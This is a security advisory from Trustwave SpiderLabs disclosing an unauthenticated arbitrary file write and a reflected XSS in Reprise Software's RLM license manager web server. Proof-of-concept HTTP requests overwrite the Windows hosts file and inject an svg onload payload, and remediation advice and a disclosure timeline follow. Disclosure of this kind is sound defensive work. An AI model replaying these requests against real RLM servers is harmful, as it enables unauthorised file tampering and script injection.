Trustwave SpiderLabs Security Advisory TWSL2018-006:
Multiple Vulnerabilities in Reprise Software RLM

Published: 07/18/2018
Version: 1.0

Vendor: Reprise Software (http://www.reprisesoftware.com)
Product: RLM
Version affected: 12.2BL2 and prior

Product description:
RLM is a enterprise-classlicense manager which can be administered either on
premises or in the cloud.

Finding 1: Arbitrary File Write
Credit: Adrian Pruteanu of Trustwave 

The RLM webserver running on port 5054 allows attackers to specify an arbitrary
license file to read and modify. If running elevated, exploiting rlm.exe's web
server can result in remote code execution via upload of a malware.

# Proof of Concept
By default, RLM's web server does not require authentication. Attackers can
write data to any file on disk provided rlm.exe has access to it.

### POST modifying the Windows hosts file

POST /goform/edit_lf_process HTTP/1.1
Host: a.b.c.d:5054
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://a.b.c.d:5054/goform/edit_lf_get_data
Content-Type: application/x-www-form-urlencoded
Content-Length: 1083
Cookie: user2458:13be=:0
Connection: close
Upgrade-Insecure-Requests: 1

lfdata=%23+Copyright+%28c%29+1993-2009+Microsoft+Corp.%0D%0A%23%0D%0A%23+This+is+a+sample+HOSTS+file+used+by+Microsoft+TCP%2FIP+for+Windows.%0D%0A%23%0D%0A%23+This+file+contains+the+mappings+of+IP+addresses+to+host+names.+Each%0D%0A%23+entry+should+be+kept+on+an+individual+line.+The+IP+address+should%0D%0A%23+be+placed+in+the+first+column+followed+by+the+corresponding+host+name.%0D%0A%23+The+IP+address+and+the+host+name+should+be+separated+by+at+least+one%0D%0A%23+space.%0D%0A%23%0D%0A%23+Additionally%2C+comments+%28such+as+these%29+may+be+inserted+on+individual%0D%0A%23+lines+or+following+the+machine+name+denoted+by+a+%27%23%27+symbol.%0D%0A%23%0D%0A%23+For+example%3A%0D%0A%23%0D%0A%23++++++102.54.94.97+++++rhino.acme.com++++++++++%23+source+server%0D%0A%23+++++++38.25.63.10+++++x.acme.com++++++++++++++%23+x+client+host%0D%0A%0D%0A%23+localhost+name+resolution+is+handled+within+DNS+itself.%0D%0A%23%09127.0.0.1+++++++localhost%0D%0A%23%09%3A%3A1+++++++++++++localhost%0D%0A127.0.0.1+google.com&ok=Update+License+File&lf=c%3A%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts

HTTP/1.0 200 OK
Server: GoAhead-Webs
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html


<html>
[...]<center>license file c:\windows\system32\drivers\etc\hosts written.<br>[...]

### POST confirming hosts file contents were modified

POST /goform/edit_lf_get_data HTTP/1.1
Host: a.b.c.d:5054
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://a.b.c.d:5054/goform/edit_lf_get_data
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: user2458:13be=:0
Connection: close
Upgrade-Insecure-Requests: 1

lf=c%3A%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts&ok=Edit+License+File

HTTP/1.0 200 OK
Server: GoAhead-Webs
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html

<html>
<[...]
<u>License File: c:\windows\system32\drivers\etc\hosts</u>
[...]
<td halign=center><textarea rows=30 cols=80 type=text name=lfdata># Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
127.0.0.1 google.com</textarea>

Finding 2: Cross-Site Scripting (Reflected)
Credit: Adrian Pruteanu of Trustwave 

The RLM webserver running on port 5054 is vulnerable to a reflected cross-site scripting attack in the web-based license editor.

# Proof of Concept
The payload can be passed via the "lf" parameter.

### GET with XSS payload in lf parameter

GET /goform/edit_lf_get_data?lf=c%3A%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts"><svg/onload=alert(1)>&ok=Edit+License+File HTTP/1.1
Host: a.b.c.d:5054
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://a.b.c.d:5054/goform/edit_lf_get_data
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Cookie: user2458:13be=:0
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.0 200 OK
Server: GoAhead-Webs
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html

<html>
[...]
<u>License File: c:\windows\system32\drivers\etc\hosts"><svg/onload=alert(1)></u>
[...]

Remediation Steps:
There is no official fix available. 

* Do not run RLM with high-privilege
* Limit network access to the RLM web server
* Enable strong authentication for RLM web server


Revision History:
05/18/2018 - Vulnerability disclosed to vendor
05/18/2018 - Vendor refuses to patch, insisting these are not vulnerabilities
05/21/2018 - Vendor is encouraged to reconsider and patch
06/04/2018 - Vendor confirms no patch will be developed
07/18/2018 - Advisory published


About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security 
risk. With cloud and managed security services, integrated technologies and a 
team of security experts, ethical hackers and researchers, Trustwave enables 
businesses to transform the way they manage their information security and 
compliance programs. More than three million businesses are enrolled in the 
Trustwave TrustKeeper® cloud platform, through which Trustwave delivers 
automated, efficient and cost-effective threat, vulnerability and compliance 
management. Trustwave is headquartered in Chicago, with customers in 96 
countries. For more information about Trustwave, visit 
https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.